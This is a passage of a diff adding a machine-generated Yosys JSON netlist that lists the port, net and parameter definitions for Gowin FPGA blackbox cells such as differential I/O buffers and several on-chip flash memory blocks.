], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:883.11-883.17" + } + }, + "RMOVE": { + "hide_name": 0, + "bits": [ 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:883.19-883.24" + } + }, + "RPOINT": { + "hide_name": 0, + "bits": [ 5, 6, 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:886.18-886.24" + } + }, + "RVALID": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:887.12-887.18" + } + }, + "WDIR": { + "hide_name": 0, + "bits": [ 41 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:883.47-883.51" + } + }, + "WFLAG": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:887.34-887.39" + } + }, + "WLOADN": { + "hide_name": 0, + "bits": [ 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:883.32-883.38" + } + }, + "WMOVE": { + "hide_name": 0, + "bits": [ 40 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:883.40-883.45" + } + }, + "WPOINT": { + "hide_name": 0, + "bits": [ 8, 9, 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:886.26-886.32" + } + }, + "WSTEP": { + "hide_name": 0, + "bits": [ 24, 25, 26, 27, 28, 29, 30, 31 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:882.17-882.22" + } + } + } + }, + "ELVDS_IBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1422.1-1425.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "I": { + "direction": "input", + "bits": [ 3 ] + }, + "IB": { + "direction": "input", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1424.8-1424.9" + } + }, + "IB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1424.11-1424.13" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1423.8-1423.9" + } + } + } + }, + "ELVDS_IOBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1432.1-1436.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "IO": { + "direction": "inout", + "bits": [ 3 ] + }, + "IOB": { + "direction": "inout", + "bits": [ 4 ] + }, + "I": { + "direction": "input", + "bits": [ 5 ] + }, + "OEN": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1435.7-1435.8" + } + }, + "IO": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1434.7-1434.9" + } + }, + "IOB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1434.11-1434.14" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1433.10-1433.11" + } + }, + "OEN": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1435.10-1435.13" + } + } + } + }, + "ELVDS_OBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:585.1-591.10" + }, + "ports": { + "I": { + "direction": "input", + "bits": [ 2 ] + }, + "O": { + "direction": "output", + "bits": [ 3 ] + }, + "OB": { + "direction": "output", + "bits": [ 4 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:586.9-586.10" + } + }, + "O": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:587.10-587.11" + } + }, + "OB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:588.10-588.12" + } + } + } + }, + "ELVDS_TBUF": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1427.1-1430.10" + }, + "ports": { + "O": { + "direction": "output", + "bits": [ 2 ] + }, + "OB": { + "direction": "output", + "bits": [ 3 ] + }, + "I": { + "direction": "input", + "bits": [ 4 ] + }, + "OEN": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + }, + "netnames": { + "I": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1429.8-1429.9" + } + }, + "O": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1428.8-1428.9" + } + }, + "OB": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1428.11-1428.13" + } + }, + "OEN": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1429.11-1429.14" + } + } + } + }, + "EMCU": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1702.1-1703.10" + }, + "ports": { + }, + "cells": { + }, + "netnames": { + } + }, + "FLASH128K": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1573.1-1599.10" + }, + "parameter_default_values": { + "IDLE": "0000", + "MASE_S1": "1011", + "MASE_S2": "1100", + "MASE_S3": "1101", + "MASE_S4": "1110", + "PROG_S1": "0011", + "PROG_S2": "0100", + "PROG_S3": "0101", + "PROG_S4": "0110", + "READ_S1": "0001", + "READ_S2": "0010", + "SERA_S1": "0111", + "SERA_S2": "1000", + "SERA_S3": "1001", + "SERA_S4": "1010" + }, + "ports": { + "DIN": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ] + }, + "ADDR": { + "direction": "input", + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48 ] + }, + "CS": { + "direction": "input", + "bits": [ 49 ] + }, + "AE": { + "direction": "input", + "bits": [ 50 ] + }, + "OE": { + "direction": "input", + "bits": [ 51 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 52 ] + }, + "PROG": { + "direction": "input", + "bits": [ 53 ] + }, + "SERA": { + "direction": "input", + "bits": [ 54 ] + }, + "MASE": { + "direction": "input", + "bits": [ 55 ] + }, + "NVSTR": { + "direction": "input", + "bits": [ 56 ] + }, + "IFREN": { + "direction": "input", + "bits": [ 57 ] + }, + "RESETN": { + "direction": "input", + "bits": [ 58 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90 ] + }, + "TBIT": { + "direction": "output", + "bits": [ 91 ] + } + }, + "cells": { + }, + "netnames": { + "ADDR": { + "hide_name": 0, + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1575.14-1575.18" + } + }, + "AE": { + "hide_name": 0, + "bits": [ 50 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1576.10-1576.12" + } + }, + "CS": { + "hide_name": 0, + "bits": [ 49 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1576.7-1576.9" + } + }, + "DIN": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1574.14-1574.17" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1582.15-1582.19" + } + }, + "IFREN": { + "hide_name": 0, + "bits": [ 57 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1580.7-1580.12" + } + }, + "MASE": { + "hide_name": 0, + "bits": [ 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1578.19-1578.23" + } + }, + "NVSTR": { + "hide_name": 0, + "bits": [ 56 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1579.7-1579.12" + } + }, + "OE": { + "hide_name": 0, + "bits": [ 51 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1576.13-1576.15" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 52 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1577.7-1577.11" + } + }, + "PROG": { + "hide_name": 0, + "bits": [ 53 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1578.7-1578.11" + } + }, + "RESETN": { + "hide_name": 0, + "bits": [ 58 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1581.7-1581.13" + } + }, + "SERA": { + "hide_name": 0, + "bits": [ 54 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1578.13-1578.17" + } + }, + "TBIT": { + "hide_name": 0, + "bits": [ 91 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1583.8-1583.12" + } + } + } + }, + "FLASH256K": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1523.1-1543.10" + }, + "parameter_default_values": { + "ERA_S1": "0001", + "ERA_S2": "0010", + "ERA_S3": "0011", + "ERA_S4": "0100", + "ERA_S5": "0101", + "IDLE": "0000", + "PRO_S1": "0110", + "PRO_S2": "0111", + "PRO_S3": "1000", + "PRO_S4": "1001", + "PRO_S5": "1010", + "RD_S1": "1011", + "RD_S2": "1100" + }, + "ports": { + "XADR": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8 ] + }, + "YADR": { + "direction": "input", + "bits": [ 9, 10, 11, 12, 13, 14 ] + }, + "XE": { + "direction": "input", + "bits": [ 15 ] + }, + "YE": { + "direction": "input", + "bits": [ 16 ] + }, + "SE": { + "direction": "input", + "bits": [ 17 ] + }, + "ERASE": { + "direction": "input", + "bits": [ 18 ] + }, + "PROG": { + "direction": "input", + "bits": [ 19 ] + }, + "NVSTR": { + "direction": "input", + "bits": [ 20 ] + }, + "DIN": { + "direction": "input", + "bits": [ 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84 ] + } + }, + "cells": { + }, + "netnames": { + "DIN": { + "hide_name": 0, + "bits": [ 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1528.14-1528.17" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1529.19-1529.23" + } + }, + "ERASE": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1527.7-1527.12" + } + }, + "NVSTR": { + "hide_name": 0, + "bits": [ 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1527.18-1527.23" + } + }, + "PROG": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1527.13-1527.17" + } + }, + "SE": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1526.13-1526.15" + } + }, + "XADR": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1524.11-1524.15" + } + }, + "XE": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1526.7-1526.9" + } + }, + "YADR": { + "hide_name": 0, + "bits": [ 9, 10, 11, 12, 13, 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1525.11-1525.15" + } + }, + "YE": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1526.10-1526.12" + } + } + } + }, + "FLASH608K": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1545.1-1565.10" + }, + "parameter_default_values": { + "ERA_S1": "0001", + "ERA_S2": "0010", + "ERA_S3": "0011", + "ERA_S4": "0100", + "ERA_S5": "0101", + "IDLE": "0000", + "PRO_S1": "0110", + "PRO_S2": "0111", + "PRO_S3": "1000", + "PRO_S4": "1001", + "PRO_S5": "1010", + "RD_S1": "1011", + "RD_S2": "1100" + }, + "ports": { + "XADR": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10 ] + }, + "YADR": { + "direction": "input", + "bits": [ 11, 12, 13, 14, 15, 16 ] + }, + "XE": { + "direction": "input", + "bits": [ 17 ] + }, + "YE": { + "direction": "input", + "bits": [ 18 ] + }, + "SE": { + "direction": "input", + "bits": [ 19 ] + }, + "ERASE": { + "direction": "input", + "bits": [ 20 ] + }, + "PROG": { + "direction": "input", + "bits": [ 21 ] + }, + "NVSTR": { + "direction": "input", + "bits": [ 22 ] + }, + "DIN": { + "direction": "input", + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86 ] + } + }, + "cells": { + }, + "netnames": { + "DIN": { + "hide_name": 0, + "bits": [ 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1550.14-1550.17" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1551.19-1551.23" + } + }, + "ERASE": { + "hide_name": 0, + "bits": [ 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1549.7-1549.12" + } + }, + "NVSTR": { + "hide_name": 0, + "bits": [ 22 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1549.18-1549.23" + } + }, + "PROG": { + "hide_name": 0, + "bits": [ 21 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1549.13-1549.17" + } + }, + "SE": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1548.13-1548.15" + } + }, + "XADR": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1546.11-1546.15" + } + }, + "XE": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1548.7-1548.9" + } + }, + "YADR": { + "hide_name": 0, + "bits": [ 11, 12, 13, 14, 15, 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1547.11-1547.15" + } + }, + "YE": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1548.10-1548.12" + } + } + } + }, + "FLASH64K": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1705.1-1726.10" + }, + "parameter_default_values": { + "ERA_S1": "0001", + "ERA_S2": "0010", + "ERA_S3": "0011", + "ERA_S4": "0100", + "ERA_S5": "0101", + "IDLE": "0000", + "PRO_S1": "0110", + "PRO_S2": "0111", + "PRO_S3": "1000", + "PRO_S4": "1001", + "PRO_S5": "1010", + "RD_S1": "1011", + "RD_S2": "1100" + }, + "ports": { + "XADR": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6 ] + }, + "YADR": { + "direction": "input", + "bits": [ 7, 8, 9, 10, 11, 12 ] + }, + "XE": { + "direction": "input", + "bits": [ 13 ] + }, + "YE": { + "direction": "input", + "bits": [ 14 ] + }, + "SE": { + "direction": "input", + "bits": [ 15 ] + }, + "ERASE": { + "direction": "input", + "bits": [ 16 ] + }, + "PROG": { + "direction": "input", + "bits": [ 17 ] + }, + "NVSTR": { + "direction": "input", + "bits": [ 18 ] + }, + "SLEEP": { + "direction": "input", + "bits": [ 19 ] + }, + "DIN": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83 ] + } + }, + "cells": { + }, + "netnames": { + "DIN": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1711.14-1711.17" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1712.19-1712.23" + } + }, + "ERASE": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1709.7-1709.12" + } + }, + "NVSTR": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1709.18-1709.23" + } + }, + "PROG": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1709.13-1709.17" + } + }, + "SE": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1708.13-1708.15" + } + }, + "SLEEP": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1710.7-1710.12" + } + }, + "XADR": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1706.11-1706.15" + } + }, + "XE": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1708.7-1708.9" + } + }, + "YADR": { + "hide_name": 0, + "bits": [ 7, 8, 9, 10, 11, 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1707.11-1707.15" + } + }, + "YE": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1708.10-1708.12" + } + } + } + }, + "FLASH64KZ": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1728.1-1748.10" + }, + "parameter_default_values": { + "ERA_S1": "0001", + "ERA_S2": "0010", + "ERA_S3": "0011", + "ERA_S4": "0100", + "ERA_S5": "0101", + "IDLE": "0000", + "PRO_S1": "0110", + "PRO_S2": "0111", + "PRO_S3": "1000", + "PRO_S4": "1001", + "PRO_S5": "1010", + "RD_S1": "1011", + "RD_S2": "1100" + }, + "ports": { + "XADR": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6 ] + }, + "YADR": { + "direction": "input", + "bits": [ 7, 8, 9, 10, 11, 12 ] + }, + "XE": { + "direction": "input", + "bits": [ 13 ] + }, + "YE": { + "direction": "input", + "bits": [ 14 ] + }, + "SE": { + "direction": "input", + "bits": [ 15 ] + }, + "ERASE": { + "direction": "input", + "bits": [ 16 ] + }, + "PROG": { + "direction": "input", + "bits": [ 17 ] + }, + "NVSTR": { + "direction": "input", + "bits": [ 18 ] + }, + "DIN": { + "direction": "input", + "bits": [ 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82 ] + } + }, + "cells": { + }, + "netnames": { + "DIN": { + "hide_name": 0, + "bits": [ 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1733.14-1733.17" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1734.19-1734.23" + } + }, + "ERASE": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1732.7-1732.12" + } + }, + "NVSTR": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1732.18-1732.23" + } + }, + "PROG": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1732.13-1732.17" + } + }, + "SE": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1731.13-1731.15" + } + }, + "XADR": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1729.11-1729.15" + } + }, + "XE": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1731.7-1731.9" + } + }, + "YADR": { + "hide_name": 0, + "bits": [ 7, 8, 9, 10, 11, 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1730.11-1730.15" + } + }, + "YE": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1731.10-1731.12" + } + } + } + }, + "FLASH96K": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1512.1-1521.10" + }, + "ports": { + "RA": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7 ] + }, + "CA": { + "direction": "input", + "bits": [ 8, 9, 10, 11, 12, 13 ] + }, + "PA": { + "direction": "input", + "bits": [ 14, 15, 16, 17, 18, 19 ] + }, + "MODE": { + "direction": "input", + "bits": [ 20, 21, 22, 23 ] + }, + "SEQ": { + "direction": "input", + "bits": [ 24, 25 ] + }, + "ACLK": { + "direction": "input", + "bits": [ 26 ] + }, + "PW": { + "direction": "input", + "bits": [ 27 ] + }, + "RESET": { + "direction": "input", + "bits": [ 28 ] + }, + "PE": { + "direction": "input", + "bits": [ 29 ] + }, + "OE": { + "direction": "input", + "bits": [ 30 ] + }, + "RMODE": { + "direction": "input", + "bits": [ 31, 32 ] + }, + "WMODE": { + "direction": "input", + "bits": [ 33, 34 ] + }, + "RBYTESEL": { + "direction": "input", + "bits": [ 35, 36 ] + }, + "WBYTESEL": { + "direction": "input", + "bits": [ 37, 38 ] + }, + "DIN": { + "direction": "input", + "bits": [ 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 